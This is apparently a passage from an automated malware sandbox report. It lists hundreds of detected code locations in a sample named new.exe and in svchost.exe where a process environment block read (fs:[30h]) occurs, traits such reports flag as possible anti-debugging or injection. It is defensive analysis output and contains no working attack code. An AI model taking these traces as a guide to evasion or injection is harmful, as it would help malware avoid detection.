                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00F5D4F0 mov eax, dword ptr fs:[00000030h]5_2_00F5D4F0
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00F5D490 mov eax, dword ptr fs:[00000030h]5_2_00F5D490
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00F5BE20 mov eax, dword ptr fs:[00000030h]5_2_00F5BE20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h]7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B035C mov ecx, dword ptr fs:[00000030h]7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B035C mov eax, dword ptr fs:[00000030h]7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034FA352 mov eax, dword ptr fs:[00000030h]7_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D8350 mov ecx, dword ptr fs:[00000030h]7_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0350634F mov eax, dword ptr fs:[00000030h]7_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D437C mov eax, dword ptr fs:[00000030h]7_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h]7_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h]7_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h]7_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C310 mov ecx, dword ptr fs:[00000030h]7_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03450310 mov ecx, dword ptr fs:[00000030h]7_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EC3CD mov eax, dword ptr fs:[00000030h]7_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h]7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h]7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h]7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h]7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE3DB mov ecx, dword ptr fs:[00000030h]7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h]7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D43D4 mov eax, dword ptr fs:[00000030h]7_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D43D4 mov eax, dword ptr fs:[00000030h]7_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h]7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h]7_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h]7_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h]7_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034663FF mov eax, dword ptr fs:[00000030h]7_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h]7_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h]7_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h]7_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345438F mov eax, dword ptr fs:[00000030h]7_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345438F mov eax, dword ptr fs:[00000030h]7_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]7_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]7_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]7_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B8243 mov eax, dword ptr fs:[00000030h]7_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B8243 mov ecx, dword ptr fs:[00000030h]7_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0350625D mov eax, dword ptr fs:[00000030h]7_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A250 mov eax, dword ptr fs:[00000030h]7_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436259 mov eax, dword ptr fs:[00000030h]7_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EA250 mov eax, dword ptr fs:[00000030h]7_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EA250 mov eax, dword ptr fs:[00000030h]7_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]7_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]7_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]7_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342826B mov eax, dword ptr fs:[00000030h]7_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342823B mov eax, dword ptr fs:[00000030h]7_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035062D6 mov eax, dword ptr fs:[00000030h]7_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]7_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]7_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]7_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E284 mov eax, dword ptr fs:[00000030h]7_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E284 mov eax, dword ptr fs:[00000030h]7_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]7_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]7_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]7_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402A0 mov eax, dword ptr fs:[00000030h]7_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402A0 mov eax, dword ptr fs:[00000030h]7_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov ecx, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov ecx, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C156 mov eax, dword ptr fs:[00000030h]7_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C8158 mov eax, dword ptr fs:[00000030h]7_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436154 mov eax, dword ptr fs:[00000030h]7_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436154 mov eax, dword ptr fs:[00000030h]7_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504164 mov eax, dword ptr fs:[00000030h]7_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504164 mov eax, dword ptr fs:[00000030h]7_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov ecx, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F0115 mov eax, dword ptr fs:[00000030h]7_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03460124 mov eax, dword ptr fs:[00000030h]7_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F61C3 mov eax, dword ptr fs:[00000030h]7_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F61C3 mov eax, dword ptr fs:[00000030h]7_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035061E5 mov eax, dword ptr fs:[00000030h]7_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034601F8 mov eax, dword ptr fs:[00000030h]7_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03470185 mov eax, dword ptr fs:[00000030h]7_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EC188 mov eax, dword ptr fs:[00000030h]7_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EC188 mov eax, dword ptr fs:[00000030h]7_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D4180 mov eax, dword ptr fs:[00000030h]7_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D4180 mov eax, dword ptr fs:[00000030h]7_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]7_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]7_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]7_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03432050 mov eax, dword ptr fs:[00000030h]7_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6050 mov eax, dword ptr fs:[00000030h]7_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345C073 mov eax, dword ptr fs:[00000030h]7_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B4000 mov ecx, dword ptr fs:[00000030h]7_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A020 mov eax, dword ptr fs:[00000030h]7_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C020 mov eax, dword ptr fs:[00000030h]7_2_0342C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6030 mov eax, dword ptr fs:[00000030h]7_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B20DE mov eax, dword ptr fs:[00000030h]7_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034380E9 mov eax, dword ptr fs:[00000030h]7_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B60E0 mov eax, dword ptr fs:[00000030h]7_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C0F0 mov eax, dword ptr fs:[00000030h]7_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034720F0 mov ecx, dword ptr fs:[00000030h]7_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343208A mov eax, dword ptr fs:[00000030h]7_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034280A0 mov eax, dword ptr fs:[00000030h]7_2_034280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C80A8 mov eax, dword ptr fs:[00000030h]7_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F60B8 mov eax, dword ptr fs:[00000030h]7_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F60B8 mov ecx, dword ptr fs:[00000030h]7_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346674D mov esi, dword ptr fs:[00000030h]7_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346674D mov eax, dword ptr fs:[00000030h]7_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346674D mov eax, dword ptr fs:[00000030h]7_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430750 mov eax, dword ptr fs:[00000030h]7_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE75D mov eax, dword ptr fs:[00000030h]7_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472750 mov eax, dword ptr fs:[00000030h]7_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472750 mov eax, dword ptr fs:[00000030h]7_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B4755 mov eax, dword ptr fs:[00000030h]7_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438770 mov eax, dword ptr fs:[00000030h]7_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C700 mov eax, dword ptr fs:[00000030h]7_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430710 mov eax, dword ptr fs:[00000030h]7_2_03430710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03460710 mov eax, dword ptr fs:[00000030h]7_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C720 mov eax, dword ptr fs:[00000030h]7_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C720 mov eax, dword ptr fs:[00000030h]7_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346273C mov eax, dword ptr fs:[00000030h]7_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346273C mov ecx, dword ptr fs:[00000030h]7_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346273C mov eax, dword ptr fs:[00000030h]7_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AC730 mov eax, dword ptr fs:[00000030h]7_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343C7C0 mov eax, dword ptr fs:[00000030h]7_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B07C3 mov eax, dword ptr fs:[00000030h]7_2_034B07C3
